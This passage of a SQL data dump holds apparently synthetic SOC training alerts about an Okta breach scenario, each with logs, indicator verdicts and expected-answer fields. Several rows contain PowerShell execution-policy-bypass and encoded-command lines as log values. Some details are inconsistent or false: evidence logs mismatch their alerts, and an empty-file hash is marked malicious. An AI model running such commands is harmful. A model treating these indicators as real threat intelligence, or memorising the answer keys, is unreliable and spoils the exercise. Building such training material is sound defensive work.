2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.574Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-28T13:45:27Z\\\",\\\"event_id\\\":\\\"9876543210\\\",\\\"action\\\":\\\"EXFILTRATION\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.42\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"file_exfiltrated\\\":\\\"encryption_keys_backup_20231028.tar.gz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"cloud_service_provider\\\":\\\"aws\\\",\\\"bucket_name\\\":\\\"sensitive-keys-backup\\\",\\\"user_agent\\\":\\\"python-requests/2.25.1\\\",\\\"status\\\":\\\"SUCCESS\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(897, 'Potential Threat to User Master Passwords Assessed', 'high', 'Threat intelligence reports', 'An advanced risk assessment was conducted following a breach, evaluating the potential exposure of user master passwords. Indicators of compromise (IoCs) include malicious IP addresses and suspect file hashes. Immediate action is required to mitigate any further risk and protect user data.', 'Risk Assessment', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:30:00Z\",\"event_type\":\"breach_assessment\",\"internal_ip\":\"10.0.1.45\",\"external_ip\":\"203.0.113.5\",\"user\":\"admin_user\",\"filename\":\"compromised_data_dump.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_ips\":[\"203.0.113.5\",\"198.51.100.10\"],\"compromised_users\":[\"admin_user\",\"user123\"],\"detected_malware\":[\"APT_Backdoor_v1\"],\"actions_taken\":[\"password_reset_initiated\",\"forensics_collection\"]}', '2026-01-15 00:59:56', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"compromised_data_dump.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File suspected to contain exfiltrated user data\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Account seen in unusual login patterns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.575Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:30:00Z\\\",\\\"event_type\\\":\\\"breach_assessment\\\",\\\"internal_ip\\\":\\\"10.0.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"compromised_data_dump.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_ips\\\":[\\\"203.0.113.5\\\",\\\"198.51.100.10\\\"],\\\"compromised_users\\\":[\\\"admin_user\\\",\\\"user123\\\"],\\\"detected_malware\\\":[\\\"APT_Backdoor_v1\\\"],\\\"actions_taken\\\":[\\\"password_reset_initiated\\\",\\\"forensics_collection\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(898, 'Suspicious Login from Third-Party Contractor', 'high', 'SIEM logs', 'The attackers exploited compromised credentials from a third-party contractor to enter Okta\'s network, initiating the breach. The login was detected from an unusual IP address not previously associated with the contractor.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"Login\",\"user\":\"jdoe_contractor\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"event_description\":\"Successful login to Okta support system\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"additional_info\":{\"login_method\":\"Password\",\"location\":\"Unusual - Not previously seen\"}}', '2026-01-15 00:59:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"jdoe_contractor\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Username associated with third-party contractor account\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address previously associated with unauthorized access attempts\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.576Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"Login\\\",\\\"user\\\":\\\"jdoe_contractor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"event_description\\\":\\\"Successful login to Okta support system\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"additional_info\\\":{\\\"login_method\\\":\\\"Password\\\",\\\"location\\\":\\\"Unusual - Not previously seen\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(899, 'Execution of Unauthorized Scripts', 'high', 'Endpoint detection and response (EDR) tools', 'The Lapsus$ group executed unauthorized scripts on the compromised system, attempting to escalate privileges within the support system. This activity is consistent with their known tactics for gaining higher access.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T09:24:36Z\",\"event_id\":\"EDR-123456\",\"source_ip\":\"185.220.101.1\",\"destination_ip\":\"10.0.0.12\",\"username\":\"jdoe\",\"script_name\":\"escalate_priv.ps1\",\"script_hash\":\"f7d3d9a4c6e8b1ecf3a5d47a5e6f9b3c\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\escalate_priv.ps1\",\"target_system\":\"support-system.local\",\"severity\":\"High\"}', '2026-01-15 00:59:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.220.101.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid internal user account\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"escalate_priv.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script used for privilege escalation\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"f7d3d9a4c6e8b1ecf3a5d47a5e6f9b3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious script\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(900, 'Establishing Permanent Access - Backdoor Deployment', 'critical', 'Network traffic analysis', 'Anomalous network activity detected involving the deployment of backdoors within the compromised network environment. The attackers are setting up persistent access channels to maintain control over the network.', 'Persistence', 'T1059.001 - PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:07Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":443,\"action\":\"Allowed\",\"file_hash\":\"f2a1e2d3c4b5a6f7d8e9c0b1a2d3e4f5\",\"username\":\"jdoe\",\"filename\":\"backdoor.exe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-01-15 00:59:58', '2026-02-16 17:55:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal host involved in the incident.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a1e2d3c4b5a6f7d8e9c0b1a2d3e4f5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used for persistent access.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Report\",\"verdict\":\"malicious\",\"details\":\"File observed in other APT campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"HR Database\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(901, 'Lateral Movement Across Okta\'s Systems', 'high', 'Network logs', 'The attackers successfully moved laterally across Okta\'s internal systems, targeting sensitive areas to maximize their data access. This step represents an expert-level operation in which the attacker used stolen credentials to access a critical database server.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:54Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.45\",\"src_user\":\"jdoe@okta.com\",\"dst_user\":\"admin@okta.com\",\"action\":\"SSH login\",\"result\":\"success\",\"hash_used\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"sensitive_data_access.sh\"}', '2026-01-15 00:59:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAssetInventory\",\"verdict\":\"internal\",\"details\":\"Internal database server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe@okta.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalUserDB\",\"verdict\":\"suspicious\",\"details\":\"Credentials possibly compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareHashRegistry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(902, 'Exfiltration of Customer Data', 'critical', 'Data loss prevention (DLP) systems', 'Lapsus$ initiated data exfiltration, focusing on information from 366 customers, raising severe supply chain trust concerns.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T15:43:21Z\",\"event_id\":\"EXF12345\",\"source_ip\":\"192.168.45.23\",\"destination_ip\":\"185.199.108.153\",\"user\":\"jdoe\",\"file_name\":\"customer_data_backup.zip\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"exfiltrate\",\"protocol\":\"HTTPS\",\"bytes_transferred\":52428800}', '2026-01-15 00:59:58', '2026-02-16 17:55:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.45.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in the exfiltration process.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"customer_data_backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP System\",\"verdict\":\"suspicious\",\"details\":\"File name indicates potential data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known data exfiltration tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"},{\"timestamp\":\"2026-02-01T20:31:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"},{\"timestamp\":\"2026-02-01T20:30:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 